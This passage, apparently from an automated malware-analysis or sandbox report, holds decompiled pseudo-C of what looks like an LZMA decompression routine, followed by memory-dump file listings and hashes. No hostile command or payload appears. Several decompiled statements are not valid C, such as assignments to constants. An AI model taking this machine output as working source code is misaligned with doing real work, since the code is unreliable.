              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												L65:
              												goto L58;
              											}
              										case 0x10:
              											L109:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												L165:
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											L110:
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t365 = __ebp - 0x70;
              											 *_t365 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t365;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L111;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											goto L132;
              										case 0x12:
              											L128:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L131:
              												__eax =  *(__ebp - 0x58);
              												 *(__ebp - 0x84) = 0x13;
              												__esi =  *(__ebp - 0x58) + 2;
              												L132:
              												 *(_t644 - 0x54) = _t642;
              												goto L133;
              											}
              											L129:
              											__eax =  *(__ebp - 0x4c);
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											__eflags = __eax;
              											__eax =  *(__ebp - 0x58) + __eax + 4;
              											goto L130;
              										case 0x13:
              											L141:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												L143:
              												_t469 = __ebp - 0x58;
              												 *_t469 =  *(__ebp - 0x58) + 0x204;
              												__eflags =  *_t469;
              												 *(__ebp - 0x30) = 0x10;
              												 *(__ebp - 0x40) = 8;
              												L144:
              												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
              												L145:
              												 *(_t644 - 0x50) = 1;
              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
              												goto L149;
              											}
              											L142:
              											__eax =  *(__ebp - 0x4c);
              											__ecx =  *(__ebp - 0x58);
              											__eax =  *(__ebp - 0x4c) << 4;
              											 *(__ebp - 0x30) = 8;
              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              											L130:
              											 *(__ebp - 0x58) = __eax;
              											 *(__ebp - 0x40) = 3;
              											goto L144;
              										case 0x14:
              											L156:
              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              											__eax =  *(__ebp - 0x80);
              											while(1) {
              												L140:
              												 *(_t644 - 0x88) = _t537;
              												goto L1;
              											}
              										case 0x15:
              											L91:
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              											__al = __al & 0x000000fd;
              											__eax = (__eflags >= 0) - 1 + 0xb;
              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              											goto L120;
              										case 0x16:
              											goto L0;
              										case 0x17:
              											while(1) {
              												L145:
              												 *(_t644 - 0x50) = 1;
              												 *(_t644 - 0x48) =  *(_t644 - 0x40);
              												goto L149;
              											}
              										case 0x18:
              											goto L146;
              										case 0x19:
              											L94:
              											__eflags = __ebx - 4;
              											if(__ebx < 4) {
              												L98:
              												 *(__ebp - 0x2c) = __ebx;
              												L119:
              												_t393 = __ebp - 0x2c;
              												 *_t393 =  *(__ebp - 0x2c) + 1;
              												__eflags =  *_t393;
              												L120:
              												__eax =  *(__ebp - 0x2c);
              												__eflags = __eax;
              												if(__eax == 0) {
              													L166:
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              													goto L170;
              												}
              												L121:
              												__eflags = __eax -  *(__ebp - 0x60);
              												if(__eax >  *(__ebp - 0x60)) {
              													goto L171;
              												}
              												L122:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              												__eax =  *(__ebp - 0x30);
              												_t400 = __ebp - 0x60;
              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              												__eflags =  *_t400;
              												goto L123;
              											}
              											L95:
              											__ecx = __ebx;
              											__eax = __ebx;
              											__ecx = __ebx >> 1;
              											__eax = __ebx & 0x00000001;
              											__ecx = (__ebx >> 1) - 1;
              											__al = __al | 0x00000002;
              											__eax = (__ebx & 0x00000001) << __cl;
              											__eflags = __ebx - 0xe;
              											 *(__ebp - 0x2c) = __eax;
              											if(__ebx >= 0xe) {
              												L97:
              												__ebx = 0;
              												 *(__ebp - 0x48) = __ecx;
              												L102:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													L107:
              													__eax = __eax + __ebx;
              													 *(__ebp - 0x40) = 4;
              													 *(__ebp - 0x2c) = __eax;
              													__eax =  *(__ebp - 4);
              													__eax =  *(__ebp - 4) + 0x644;
              													__eflags = __eax;
              													L108:
              													__ebx = 0;
              													 *(__ebp - 0x58) = __eax;
              													 *(__ebp - 0x50) = 1;
              													 *(__ebp - 0x44) = 0;
              													 *(__ebp - 0x48) = 0;
              													L112:
              													__eax =  *(__ebp - 0x40);
              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              														L118:
              														_t391 = __ebp - 0x2c;
              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
              														__eflags =  *_t391;
              														goto L119;
              													}
              													L113:
              													__eax =  *(__ebp - 0x50);
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              													__eax =  *(__ebp - 0x58);
              													__esi = __edi + __eax;
              													 *(__ebp - 0x54) = __esi;
              													__ax =  *__esi;
              													__ecx = __ax & 0x0000ffff;
              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              													__eflags =  *(__ebp - 0xc) - __edx;
              													if( *(__ebp - 0xc) >= __edx) {
              														__ecx = 0;
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              														__ecx = 1;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              														__ebx = 1;
              														__ecx =  *(__ebp - 0x48);
              														__ebx = 1 << __cl;
              														__ecx = 1 << __cl;
              														__ebx =  *(__ebp - 0x44);
              														__ebx =  *(__ebp - 0x44) | __ecx;
              														__cx = __ax;
              														__cx = __ax >> 5;
              														__eax = __eax - __ecx;
              														__edi = __edi + 1;
              														__eflags = __edi;
              														 *(__ebp - 0x44) = __ebx;
              														 *__esi = __ax;
              														 *(__ebp - 0x50) = __edi;
              													} else {
              														 *(__ebp - 0x10) = __edx;
              														0x800 = 0x800 - __ecx;
              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              														 *__esi = __dx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L111:
              														_t368 = __ebp - 0x48;
              														 *_t368 =  *(__ebp - 0x48) + 1;
              														__eflags =  *_t368;
              														goto L112;
              													} else {
              														L117:
              														goto L109;
              													}
              												}
              												L103:
              												__ecx =  *(__ebp - 0xc);
              												__ebx = __ebx + __ebx;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              													__ecx =  *(__ebp - 0x10);
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													__ebx = __ebx | 0x00000001;
              													__eflags = __ebx;
              													 *(__ebp - 0x44) = __ebx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													L101:
              													_t338 = __ebp - 0x48;
              													 *_t338 =  *(__ebp - 0x48) - 1;
              													__eflags =  *_t338;
              													goto L102;
              												} else {
              													L106:
              													goto L99;
              												}
              											}
              											L96:
              											__edx =  *(__ebp - 4);
              											__eax = __eax - __ebx;
              											 *(__ebp - 0x40) = __ecx;
              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              											goto L108;
              										case 0x1a:
              											L56:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												L162:
              												 *(__ebp - 0x88) = 0x1a;
              												goto L170;
              											}
              											L57:
              											__ecx =  *(__ebp - 0x68);
              											__al =  *(__ebp - 0x5c);
              											__edx =  *(__ebp - 8);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              											 *( *(__ebp - 0x68)) = __al;
              											__ecx =  *(__ebp - 0x14);
              											 *(__ecx +  *(__ebp - 8)) = __al;
              											__eax = __ecx + 1;
              											__edx = 0;
              											_t192 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t192;
              											goto L80;
              										case 0x1b:
              											L76:
              											__eflags =  *(__ebp - 0x64);
              											if( *(__ebp - 0x64) == 0) {
              												L163:
              												 *(__ebp - 0x88) = 0x1b;
              												goto L170;
              											}
              											L77:
              											__eax =  *(__ebp - 0x14);
              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              											__eflags = __eax -  *(__ebp - 0x74);
              											if(__eax >=  *(__ebp - 0x74)) {
              												__eax = __eax +  *(__ebp - 0x74);
              												__eflags = __eax;
              											}
              											__edx =  *(__ebp - 8);
              											__cl =  *(__eax + __edx);
              											__eax =  *(__ebp - 0x14);
              											 *(__ebp - 0x5c) = __cl;
              											 *(__eax + __edx) = __cl;
              											__eax = __eax + 1;
              											__edx = 0;
              											_t275 = __eax %  *(__ebp - 0x74);
              											__eax = __eax /  *(__ebp - 0x74);
              											__edx = _t275;
              											__eax =  *(__ebp - 0x68);
              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              											_t284 = __ebp - 0x64;
              											 *_t284 =  *(__ebp - 0x64) - 1;
              											__eflags =  *_t284;
              											 *( *(__ebp - 0x68)) = __cl;
              											L80:
              											 *(__ebp - 0x14) = __edx;
              											goto L81;
              										case 0x1c:
              											while(1) {
              												L123:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													break;
              												}
              												L124:
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t414 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t414;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              												__eflags =  *(__ebp - 0x30);
              												 *( *(__ebp - 0x68)) = __cl;
              												 *(__ebp - 0x14) = _t414;
              												if( *(__ebp - 0x30) > 0) {
              													continue;
              												} else {
              													L127:
              													L81:
              													 *(__ebp - 0x88) = 2;
              													goto L1;
              												}
              											}
              											L167:
              											 *(__ebp - 0x88) = 0x1c;
              											goto L170;
              									}
              								}
              								L171:
              								_t539 = _t538 | 0xffffffff;
              								goto L172;
              							}
              						}
              					}
              				}
              			}















              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c3
              0x0040738c

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
              • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00407291() {
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int* _t605;
              				void* _t612;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t612 - 0x40) != 0) {
              						 *(_t612 - 0x84) = 0x13;
              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
              						goto L132;
              					} else {
              						__eax =  *(__ebp - 0x4c);
              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              						__ecx =  *(__ebp - 0x58);
              						__eax =  *(__ebp - 0x4c) << 4;
              						__eax =  *(__ebp - 0x58) + __eax + 4;
              						L130:
              						 *(__ebp - 0x58) = __eax;
              						 *(__ebp - 0x40) = 3;
              						L144:
              						 *(__ebp - 0x7c) = 0x14;
              						L145:
              						__eax =  *(__ebp - 0x40);
              						 *(__ebp - 0x50) = 1;
              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
              						L149:
              						if( *(__ebp - 0x48) <= 0) {
              							__ecx =  *(__ebp - 0x40);
              							__ebx =  *(__ebp - 0x50);
              							0 = 1;
              							__eax = 1 << __cl;
              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
              							__eax =  *(__ebp - 0x7c);
              							 *(__ebp - 0x44) = __ebx;
              							while(1) {
              								L140:
              								 *(_t612 - 0x88) = _t533;
              								while(1) {
              									L1:
              									_t534 =  *(_t612 - 0x88);
              									if(_t534 > 0x1c) {
              										break;
              									}
              									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              										case 0:
              											if( *(_t612 - 0x6c) == 0) {
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											_t534 =  *( *(_t612 - 0x70));
              											if(_t534 > 0xe1) {
              												goto L171;
              											}
              											_t538 = _t534 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t569);
              											_push(9);
              											_pop(_t570);
              											_t608 = _t538 / _t569;
              											_t540 = _t538 % _t569 & 0x000000ff;
              											asm("cdq");
              											_t603 = _t540 % _t570 & 0x000000ff;
              											 *(_t612 - 0x3c) = _t603;
              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
              											_t611 = (0x300 << _t603 + _t608) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
              												L10:
              												if(_t611 == 0) {
              													L12:
              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t611 = _t611 - 1;
              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
              												} while (_t611 != 0);
              												goto L12;
              											}
              											if( *(_t612 - 4) != 0) {
              												GlobalFree( *(_t612 - 4));
              											}
              											_t534 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t612 - 4) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t612 - 0x6c);
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 1;
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											_t45 = _t612 - 0x48;
              											 *_t45 =  *(_t612 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t612 - 0x48) < 4) {
              												goto L13;
              											}
              											_t546 =  *(_t612 - 0x40);
              											if(_t546 ==  *(_t612 - 0x74)) {
              												L20:
              												 *(_t612 - 0x48) = 5;
              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											 *(_t612 - 0x74) = _t546;
              											if( *(_t612 - 8) != 0) {
              												GlobalFree( *(_t612 - 8));
              											}
              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
              											 *(_t612 - 8) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
              											 *(_t612 - 0x84) = 6;
              											 *(_t612 - 0x4c) = _t553;
              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
              											goto L132;
              										case 3:
              											L21:
              											__eflags =  *(_t612 - 0x6c);
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 3;
              												goto L170;
              											}
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											_t67 = _t612 - 0x70;
              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
              											if( *(_t612 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t531 =  *_t605;
              											_t588 = _t531 & 0x0000ffff;
              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
              											if( *(_t612 - 0xc) >= _t564) {
              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
              												 *(_t612 - 0x40) = 1;
              												_t532 = _t531 - (_t531 >> 5);
              												__eflags = _t532;
              												 *_t605 = _t532;
              											} else {
              												 *(_t612 - 0x10) = _t564;
              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
              											}
              											if( *(_t612 - 0x10) >= 0x1000000) {
              												goto L139;
              											} else {
              												goto L137;
              											}
              										case 5:
              											L137:
              											if( *(_t612 - 0x6c) == 0) {
              												 *(_t612 - 0x88) = 5;
              												goto L170;
              											}
              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
              											L139:
              											_t533 =  *(_t612 - 0x84);
              											goto L140;
              										case 6:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												goto L132;
              											}
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											goto L132;
              										case 8:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xa;
              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              											} else {
              												__eax =  *(__ebp - 0x38);
              												__ecx =  *(__ebp - 4);
              												__eax =  *(__ebp - 0x38) + 0xf;
              												 *(__ebp - 0x84) = 9;
              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              											}
              											goto L132;
              										case 9:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L90;
              											}
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t259;
              											0 | _t259 = _t259 + _t259 + 9;
              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
              											goto L76;
              										case 0xa:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
